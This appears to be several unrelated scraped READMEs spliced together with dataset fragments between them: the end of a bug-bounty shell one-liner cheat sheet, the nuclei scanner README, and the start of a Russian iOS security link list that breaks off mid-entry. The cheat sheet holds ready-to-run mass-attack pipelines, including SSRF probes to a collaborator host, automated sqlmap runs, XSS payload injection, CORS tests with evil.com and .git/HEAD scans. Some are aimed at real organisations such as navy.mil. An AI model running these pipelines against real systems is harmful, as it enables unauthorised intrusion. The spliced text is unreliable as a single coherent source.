'@OFJAAAH'\n```\n\n### Recon to search SSRF Test\n\n- [Explaining command](https://bit.ly/3shFFJ5)\n\n```bash\nfindomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep \"=\" | qsreplace http://YOUR.burpcollaborator.net\n```\n\n\n### ShuffleDNS to domains in file scan nuclei.\n\n- [Explaining command](https://bit.ly/2L3YVsc)\n\n```bash\nxargs -a domain -I@ -P500 sh -c 'shuffledns -d \"@\" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1\n```\n\n\n### Search Asn Amass\n\n- [Explaining command](https://bit.ly/2EMooDB)\n\nAmass intel will search the organization \"paypal\" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me)\n\n```bash\namass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''\n```\n\n### SQLINJECTION Mass domain file\n\n- [Explaining command](https://bit.ly/354lYuf)\n\n```bash\n\nhttpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'\n```\n\n\n### Using chaos search js\n\n\n- [Explaining command](https://bit.ly/32vfRg7)\n\nChaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of \"att.com\". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for \"(http|https)://att.com\" to make sure we dont recieve output for domains that are not \"att.com\".\n\n```bash\nchaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s \"@\" -d 2' | grep -Eo \"(http|https)://[^/\"].*.js+\" | sed \"s#]\n```\n\n### Search Subdomain using Gospider\n\n\n- [Explaining command](https://bit.ly/2QtG9do)\n\nGoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS\n\n```bash\ngospider -d 0 -s \"https://site.com\" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/\"]+' | anew\n```\n\n### Using gospider to chaos\n\n\n- [Explaining command](https://bit.ly/2D4vW3W)\n\nGoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.\n\n\n```bash\nchaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s \"@\" -d 3'\n```\n\n### Using recon.dev and gospider crawler subdomains\n\n- [Explaining command](https://bit.ly/32pPRDa)\n\nWe will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces\nIf anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains.\nXargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls.\n\n```bash\ncurl \"https://recon.dev/api/search?key=apiKEY&domain=paypal.com\" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/\"]+' | anew\n```\n\n### PSQL - search subdomain using cert.sh\n\n- [Explaining command](https://bit.ly/32rMA6e)\n\nMake use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs\n\n```bash\npsql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\\n' | grep twitch | anew\n```\n\n### Search subdomains using github and httpx\n\n- [Github-search](https://github.com/gwen001/github-search)\n\nUsing python3 to search subdomains, httpx filter hosts by up status-code response (200)\n\n```python\n./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title\n```\n\n### Search SQLINJECTION using qsreplace search syntax error\n\n- [Explained command](https://bit.ly/3hxFWS2)\n\n```bash\ngrep \"=\" .txt| qsreplace \"' OR '1\" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn \"syntax\\|mysql\" output 2>/dev/null && \\printf \"TARGET \\033[0;32mCould Be Exploitable\\e[m\\n\" || printf \"TARGET \\033[0;31mNot Vulnerable\\e[m\\n\"\n```\n\n### Search subdomains using jldc\n\n- [Explained command](https://bit.ly/2YBlEjm)\n\n```bash\ncurl -s \"https://jldc.me/anubis/subdomains/att.com\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | anew\n```\n\n### Search subdomains in assetfinder using hakrawler spider to search links in content responses\n\n- [Explained command](https://bit.ly/3hxRvZw)\n\n```bash\nassetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep \"tesla\"\n```\n\n### Search subdomains in cert.sh\n\n- [Explained command](https://bit.ly/2QrvMXl)\n\n```bash\ncurl -s \"https://crt.sh/?q=%25.att.com&output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | httpx -title -silent | anew\n```\n\n### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD\n\n- [Explained command](https://bit.ly/3lhFcTH)\n\n```bash\ncurl -s \"https://crt.sh/?q=%25.tesla.com&output=json\" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n```bash\ncurl -s \"https://crt.sh/?q=%25.enjoei.com.br&output=json\" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n### Collect js files from hosts up by gospider\n\n- [Explained command](https://bit.ly/3aWIwyI)\n\n```bash\nxargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s \"https://@\" -d 2 | grep -Eo \"(http|https)://[^/\\\"].*\\.js+\" | sed \"s#\\] \\- #\\n#g\" | anew'\n```\n\n### Subdomain search Bufferover resolving domain to httpx\n\n- [Explained command](https://bit.ly/3lno9j0)\n\n```bash\ncurl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\\n/g' | httpx -silent | anew\n```\n\n### Using gargs to gospider search with parallel proccess\n- [Gargs](https://github.com/brentp/gargs)\n\n- [Explained command](https://bit.ly/2EHj1FD)\n\n```bash\nhttpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne\n```\n\n### Injection xss using qsreplace to urls filter to gospider\n\n- [Explained command](https://bit.ly/3joryw9)\n\n```bash\ngospider -S domain.txt -t 3 -c 100 | tr \" \" \"\\n\" | grep -v \".js\" | grep \"https://\" | grep \"=\" | qsreplace '%22>'\n```\n\n### Extract URL's to apk\n\n- [Explained command](https://bit.ly/2QzXwJr)\n\n```bash\napktool d app.apk -o uberApk;grep -Phro \"(https?://)[\\w\\.-/]+[\\\"'\\`]\" uberApk/ | sed 's#\"##g' | anew | grep -v \"w3\\|android\\|github\\|schemas.android\\|google\\|goo.gl\"\n```\n\n### Chaos to Gospider\n\n- [Explained command](https://bit.ly/3gFJbpB)\n\n```bash\nchaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H \"x-forwarded-for: 127.0.0.1\" -H \"User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1\" -s @\n```\n\n### Checking invalid certificate\n\n- [Real script](https://bit.ly/2DhAwMo)\n- [Script King](https://bit.ly/34Z0kIH)\n\n```bash\nxargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep \"EXPIRED\" | awk '/domain/{print $5}' | httpx\n```\n\n### Using shodan & Nuclei\n\n- [Explained command](https://bit.ly/3jslKle)\n\nShodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column.\nhttpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.\n\n```bash\nshodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/\n```\n\n### Open Redirect test using gf.\n\n- [Explained command](https://bit.ly/3hL263x)\n\necho is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates.\n\n```bash\necho \"domain\" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n\n### Using shodan to jaeles \"How did I find a critical today? well as i said it was very simple, using shodan and jaeles\".\n\n- [Explained command](https://bit.ly/2QQfY0l)\n\n```bash\nshodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @\n```\n### Using Chaos to jaeles \"How did I find a critical today?.\n\n- [Explained command](https://bit.ly/2YXiK8N)\n\nTo chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. \n\n```bash\nchaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ \n```\n\n### Using shodan to jaeles\n\n- [Explained command](https://bit.ly/2Dkmycu)\n\n```bash\ndomain=\"domaintotest\";shodan domain $domain | awk -v domain=\"$domain\" '{print $1\".\"domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts \n```\n\n### Search to files using assetfinder and ffuf\n\n- [Explained command](https://bit.ly/2Go3Ba4)\n\n```bash\nassetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H \"Content-Type: application/json\" -t 150 -H \"X-Forwarded-For:127.0.0.1\"'\n```\n\n### HTTPX using new mode location and injection XSS using qsreplace.\n\n- [Explained command](https://bit.ly/2Go3Ba4)\n\n```bash\nhttpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/\"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\\n' | grep -Eo '(http|https)://[^/\"].*' | grep \"=\" | qsreplace \"\" \"'\n```\n\n### Grap internal juicy paths and do requests to them.\n\n- [Explained command](https://bit.ly/357b1IY)\n\n```bash\nexport domain=\"https://target\";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v \"http\" | grep -v \"http\" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'\n```\n\n### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url.\n\n- [Explained command](https://bit.ly/2R2gNn5)\n\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n\n### Using to findomain to SQLINJECTION.\n\n- [Explained command](https://bit.ly/2ZeAhcF)\n\n```bash\nfindomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1\n```\n\n### Jaeles scan to bugbounty targets.\n\n- [Explained command](https://bit.ly/3jXbTnU)\n\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @\n```\n\n### JLDC domain search subdomain, using rush and jaeles.\n\n- [Explained command](https://bit.ly/3hfNV5k)\n\n```bash\ncurl -s \"https://jldc.me/anubis/subdomains/sony.com\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'\n```\n\n### Chaos to search subdomains check cloudflareip scan port.\n\n- [Explained command](https://bit.ly/3hfNV5k)\n\n```bash\nchaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent\n```\n### Search JS to domains file.\n\n- [Explained command](https://bit.ly/2Zs13yj)\n\n```bash\ncat FILE TO TARGET | httpx -silent | subjs | anew\n```\n\n### Search JS using assetfinder, rush and hakrawler.\n\n- [Explained command](https://bit.ly/3ioYuV0)\n\n```bash\nassetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep \"paypal\"\n```\n\n### Search to CORS using assetfinder and rush\n\n- [Explained command](https://bit.ly/33qT71x)\n\n```bash\nassetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H \"Origin:evil.com\" {} | [[ $(grep -c \"evil.com\") -gt 0 ]] && printf \"\\n\\033[0;32m[VUL TO CORS] - {}\\e[m\"' 2>/dev/null\"\n```\n\n### Search to js using hakrawler and rush & unew\n\n- [Explained command](https://bit.ly/2Rqn9gn)\n\n```bash\ncat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'\n```\n\n### XARGS to dirsearch brute force.\n\n- [Explained command](https://bit.ly/32MZfCa)\n\n```bash\ncat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' \n```\n\n### Assetfinder to run massdns.\n\n- [Explained command](https://bit.ly/32T5W5O)\n\n```bash\nassetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\\..$//' | httpx -silent\n```\n\n### Extract path to js\n\n- [Explained command](https://bit.ly/3icrr5R)\n\n```bash\ncat file.js | grep -aoP \"(?<=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?&=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))\" | sort -u \n```\n\n### Find subdomains and Secrets with jsubfinder\n\n- [Explained command](https://bit.ly/3dvP6xq)\n\n```bash\ncat subdomsains.txt | httpx --silent | jsubfinder -s\n```\n\n### Search domains to Range-IPS.\n\n- [Explained command](https://bit.ly/3fa0eAO)\n\n```bash\ncat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew \n```\n\n### Search new's domains using dnsgen.\n\n- [Explained command](https://bit.ly/3kNTHNm)\n\n```bash\nxargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain\n```\n\n### List ips, domain extract, using amass + wordlist\n\n- [Explained command](https://bit.ly/2JpRsmS)\n\n```bash\namass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\\n' | sort -u > ips-amass.txt ; curl -s \"https://crt.sh/?q=%.navy.mil&output=json\" | jq '.[].name_value' | sed 's/\\\"//g' | sed 's/\\*\\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt\n```\n### Search domains using amass and search vul to nuclei.\n\n- [Explained command](https://bit.ly/3gsbzNt)\n\n```bash\namass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 \n```\n\n### Verify to cert using openssl.\n\n- [Explained command](https://bit.ly/37avq0C)\n\n```bash\nsed -ne 's/^\\( *\\)Subject:/\\1/p;/X509v3 Subject Alternative Name/{\n N;s/^.*\\n//;:a;s/^\\( *\\)\\(.*\\), /\\1\\2\\n\\1/;ta;p;q; }' < <(\n openssl x509 -noout -text -in <(\n openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' \\\n -connect hackerone.com:443 ) )\n```\n\n\n### Search domains using openssl to cert.\n\n- [Explained command](https://bit.ly/3m9AsOY)\n\n```bash\nxargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\\n/g' | httpx -silent -threads 1000 | anew \n```\n\n\n\n### Search to Hackers.\n\n- [Censys](https://censys.io)\n- [Spyce](https://spyce.com)\n- [Shodan](https://shodan.io)\n- [Viz Grey](https://viz.greynoise.io)\n- [Zoomeye](https://zoomeye.org)\n- [Onyphe](https://onyphe.io)\n- [Wigle](https://wigle.net)\n- [Intelx](https://intelx.io)\n- [Fofa](https://fofa.so)\n- [Hunter](https://hunter.io)\n- [Zorexeye](https://zorexeye.com)\n- [Pulsedive](https://pulsedive.com)\n- [Netograph](https://netograph.io)\n- [Vigilante](https://vigilante.pw)\n- [Pipl](https://pipl.com)\n- [Abuse](https://abuse.ch)\n- [Cert-sh](https://cert.sh)\n- [Maltiverse](https://maltiverse.com/search)\n- [Insecam](https://insecam.org)\n- [Anubis](https://https://jldc.me/anubis/subdomains/att.com)\n- [Dns Dumpster](https://dnsdumpster.com)\n- [PhoneBook](https://phonebook.cz)\n- [Inquest](https://labs.inquest.net)\n- [Scylla](https://scylla.sh)\n\n\n# Project\n\n[![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org)\n[![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/)\n[![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/)\n[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty)\n\n\n\n\"Buy\n\n\n"}}},{"rowIdx":676,"cells":{"text":{"kind":"string","value":"

\n \"nuclei\"\n
\n

\n\n[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)\n[![Go Report Card](https://goreportcard.com/badge/github.com/projectdiscovery/nuclei)](https://goreportcard.com/report/github.com/projectdiscovery/nuclei)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei/issues)\n\nNuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. \n\nNuclei is used to send requests across targets based on a template leading to zero false positives and providing effective scanning for known paths. Main use cases for nuclei are during initial reconnaissance phase to quickly check for low hanging fruits or CVEs across targets that are known and easily detectable. It uses [retryablehttp-go library](https://github.com/projectdiscovery/retryablehttp-go) designed to handle various errors and retries in case of blocking by WAFs, this is also one of our core modules from custom-queries.\n\nWe have also [open-sourced a dedicated repository](https://github.com/projectdiscovery/nuclei-templates) to maintain various type of templates, we hope that you will contribute there too. Templates are provided in hopes that these will be useful and will allow everyone to build their own templates for the scanner. Checkout the guide at [**GUIDE.md**](https://github.com/projectdiscovery/nuclei-templates/blob/master/GUIDE.md) for a primer on nuclei templates.\n\n# Resources\n- [Resources](#resources)\n- [Features](#features)\n- [Usage](#usage)\n- [Installation Instructions](#installation-instructions)\n - [Prerequisite](#prerequisite)\n - [From Binary](#from-binary)\n - [From Source](#from-source)\n- [Running nuclei](#running-nuclei)\n - [1. Running nuclei with single template](#1-running-nuclei-with-a-single-template)\n - [2. Running nuclei with multiple template](#2-running-nuclei-with-multiple-templates)\n- [Thanks](#thanks)\n\n # Features\n\n

\n \"nuclei\"\n
\n

\n\n - Simple and modular code base making it easy to contribute.\n - Fast And fully configurable using a template based engine.\n - Handles edge cases doing retries, backoffs etc for handling WAFs.\n - Smart matching functionality for zero false positive scanning.\n\n# Usage\n\n```bash\nnuclei -h\n```\n\nThis will display help for the tool. Here are all the switches it supports.\n\n| Flag | Description | Example |\n|----------|-------------------------------------------------------|----------------------------|\n| -c | Number of concurrent requests (default 10) | nuclei -c 100 |\n| -l | List of urls to run templates | nuclei -l urls.txt |\n| -t | Templates input file/files to check across hosts | nuclei -t git-core.yaml |\n| -t | Templates input file/files to check across hosts | nuclei -t \"path/*.yaml\" |\n| -nC | Don't Use colors in output | nuclei -nC |\n| -o | File to save output result (optional) | nuclei -o output.txt |\n| -silent | Show only found results in output | nuclei -silent |\n| -retries | Number of times to retry a failed request (default 1) | nuclei -retries 1 |\n| -timeout | Seconds to wait before timeout (default 5) | nuclei -timeout 5 |\n| -v | Show Verbose output | nuclei -v |\n| -version | Show version of nuclei | nuclei -version |\n\n\n# Installation Instructions\n\n\n### From Binary\n\nThe installation is easy. You can download the pre-built binaries for your platform from the [Releases](https://github.com/projectdiscovery/nuclei/releases/) page. Extract them using tar, move it to your `$PATH`and you're ready to go.\n\n```bash\n> tar -xzvf nuclei-linux-amd64.tar\n> mv nuclei-linux-amd64 /usr/bin/nuclei\n> nuclei -h\n```\n\n### From Source\n\nnuclei requires go1.13+ to install successfully. Run the following command to get the repo - \n\n```bash\n> GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/cmd/nuclei\n```\n\nIn order to update the tool, you can use -u flag with `go get` command.\n\n# Running nuclei\n\n### 1. Running nuclei with a single template. \n\nThis will run the tool against all the hosts in `urls.txt` and returns the matched results. \n\n```bash\n> nuclei -l urls.txt -t git-core.yaml -o results.txt\n```\n\nYou can also pass the list of hosts at standard input (STDIN). This allows for easy integration in automation pipelines.\n\nThis will run the tool against all the hosts in `urls.txt` and returns the matched results. \n\n```bash\n> cat urls.txt | nuclei -t git-core.yaml -o results.txt\n```\n\n### 2. Running nuclei with multiple templates. \n\nThis will run the tool against all the hosts in `urls.txt` with all the templates in the `path-to-templates` directory and returns the matched results. \n\n```bash\n> nuclei -l urls.txt -t \"path-to-templates/*.yaml\" -o results.txt \n```\n\n### 3. Automating nuclei with subfinder and any other similar tool.\n\n\n```bash\n> subfinder -d hackerone.com | httprob | nuclei -t \"path-to-templates/*.yaml\" -o results.txt\n```\n\nNuclei supports glob expression ending in `.yaml` meaning multiple templates can be easily passed to be executed one after the other. Please refer to [this guide](https://github.com/projectdiscovery/nuclei-templates/blob/master/GUIDE.md) to build your own custom templates.\n\n\n# Thanks\n\nnuclei is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team. Community contributions have made the project what it is. See the **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)** file for more details. Do also check out these similar awesome open-source projects that may fit in your workflow:\n\n[https://github.com/jaeles-project/jaeles](https://github.com/jaeles-project/jaeles)
\n[https://github.com/ameenmaali/qsfuzz](https://github.com/ameenmaali/qsfuzz)
\n[https://github.com/proabiral/inception](https://github.com/proabiral/inception)
\n[https://github.com/hannob/snallygaster](https://github.com/hannob/snallygaster)
\n"}}},{"rowIdx":677,"cells":{"text":{"kind":"string","value":"# iOS Security Awesome\n\nВ данном репозитории собранны материалы по безопасности iOS-приложений, различные статьи, исследования, инструменты анализа и полезные библиотеки/инструменты для обеспечения безопасности приложений. Большая часть этого материала приходит из телеграм канала [Mobile AppSec World](https://t.me/mobile_appsec_world) и его подписчиков. Репозиторий регулярно обновляется и пополняется новыми материалами.\n\n![Awesome-DevSecOps-iOS](https://user-images.githubusercontent.com/54852618/163576691-d55b3936-92c7-4232-9316-e5202f78c2ff.png)\n\n\n## Инструменты анализа\n* [bagbak](https://github.com/ChiChou/bagbak)\n* [PassionFruit]()\n* [GrapeFruit]()\n* [IOS Security Suite](https://github.com/securing/IOSSecuritySuite)\n* [Blocking Jailbreak Detection Tweaks](https://ios.cfw.guide/blocking-jailbreak-detection/#tweaks)\n* [NetworkSniffer](https://github.com/evilpenguin/NetworkSniffer) - NetworkSniffer will log ALL traffic for any iOS application. This includes WKWebView and UIWebView.\n* [Ghidra iOS kernelcache framework for reverse engineering](https://github.com/0x36/ghidra_kernelcache/)\n* [frida-ios-dump](https://github.com/AloneMonkey/frida-ios-dump)\n* [dumpdecrypted](https://github.com/stefanesser/dumpdecrypted)\n* [Yet Another Code Decrypter](https://github.com/DerekSelander/yacd)\n* [xpcspy - Bidirectional XPC message interception and more](https://github.com/hot3eed/xpcspy)\n* [checkra1n jailbreak](https://checkra.in/)\n* [Frida](https://github.com/frida/frida/releases)\n* [Objection - mobile exploration toolkit by Frida](https://github.com/sensepost/objection)\n* [Bfinject](https://github.com/BishopFox/bfinject)\n* [iFunbox](http://www.i-funbox.com/)\n* [Libimobiledevice - library to communicate with the services of the Apple ios devices](https://www.libimobiledevice.org/)\n* [iRET (iOS Reverse Engineering Toolkit)](https://www.veracode.com/sites/default/files/Resources/Tools/iRETTool.zip) - includes oTool, dumpDecrypted, SQLite, Theos, Keychain_dumper, Plutil\n* [Burp Suite](https://portswigger.net/burp/communitydownload)\n* [Cycript](https://cydia.saurik.com/api/latest/3)\n* [iLEAPP - iOS Logs, Events, And Preferences Parser](https://github.com/abrignoni/iLEAPP)\n* [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/)\n* [decrypt0r - automatically download and decrypt SecureRom stuff](https://github.com/shinvou/decrypt0r)\n* [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)\n* [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)\n* [fridax](https://github.com/NorthwaveSecurity/fridax)\n* [MOBEXLER](https://mobexler.com/)\n* [Generate Malformed QRCodes](https://github.com/h0nus/QRGen)\n* [Tool for Injecting Malicious Payloads Into Barcodes](https://github.com/huntergregal/scansploit)\n* [AFL - american fuzzy lop](https://lcamtuf.coredump.cx/afl/)\n* [Setup for i0S and Android Application Analysis](https://m2sup3rn0va.github.io/SiAAA/) - This is a cheatsheet to install tools required for i0S and Android application pentesting\n* [AES Killer (Burpsuite Plugin)](https://github.com/Ebryx/AES-Killer)\n* [ReFlutter](https://github.com/Impact-I/reFlutter)\n* [Lief](https://github.com/lief-project/LIEF)\n* [Mobile Verification Toolkit](https://github.com/mvt-project/mvt)\n* [Hack for SpringBoard to prevent kill process](https://gist.github.com/hexploitable/5a2318f89fb696da772430bfbb864cd9)\n\n## Инструменты защиты\n* [EllipticCurveKeyPair](https://github.com/agens-no/EllipticCurveKeyPair) - Sign, verify, encrypt and decrypt using the Secure Enclave on iOS and MacOS.\n\n\n## Уязвимые приложения\n* [Myriam iOS](https://github.com/GeoSn0w/Myriam)\n* [ExploitMe Mobile iPhone Labs](http://securitycompass.github.io/iPhoneLabs/)\n* [Owasp: iGoat](https://github.com/hankbao/owasp-igoat)\n* [Damn Vulnerable iOS App (DVIA)](https://github.com/prateek147/DVIA)\n* [Damn Vulnerable iOS App (DVIA) v2](https://github.com/prateek147/DVIA-v2)\n\t* [DVIA Walkthrow](https://philkeeble.com/categories/#ios)\n* [OWASP: OMTG-Hacking-Playground](https://github.com/OWASP/OMTG-Hacking-Playground)\n* Magnet Virtual Summit 2020 CTF (iOS) \n\t* [writeup 1](https://www.stark4n6.com/2020/06/magnet-virtual-summit-2020-ctf-ios.html)\n\t* [writeup 2](https://dfir300.blogspot.com/2020/06/mvs2020ctf-write-up-ios.html)\n* [r2con2020 iOS Challenge 2](https://github.com/hexploitable/r2con2020_r2frida/blob/master/ios-challenge-2.ipa)\n\t* [iOS Anti-Tampers Bypass](https://rodnt.github.io/post/2022-03-20-ios-antitampers-bypass/)\n\n\n## Видео\n### En\n* [iOS Application Vulnerabilities and how to find them](https://www.youtube.com/watch?v=2CKrw7ErzCY)\n* [Attacking iPhone XS Max](https://www.youtube.com/watch?v=8cOx7vfszZU&feature=youtu.be)\n* [Behind the Scenes of iOS Security](https://www.youtube.com/watch?v=BLGFriOKz6U)\n* [Analyzing and Attacking Apple Kernel Drivers](https://www.youtube.com/watch?v=07VqX4bbXTI)\n* [Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox](https://www.youtube.com/watch?v=bP5VP7vLLKo)\n* [Demystifying the Secure Enclave Processor](https://www.youtube.com/watch?v=7UNeUT_sRos)\n* [HackPac Hacking Pointer Authentication in iOS User Space](https://www.youtube.com/watch?v=DJFxhShJ6Ns)\n* [iOS 10 Kernel Heap Revisited](https://www.youtube.com/watch?v=DNW6Im31lQo)\n* [Recreating An iOS 0-Day Jailbreak Out Of Apple's Security 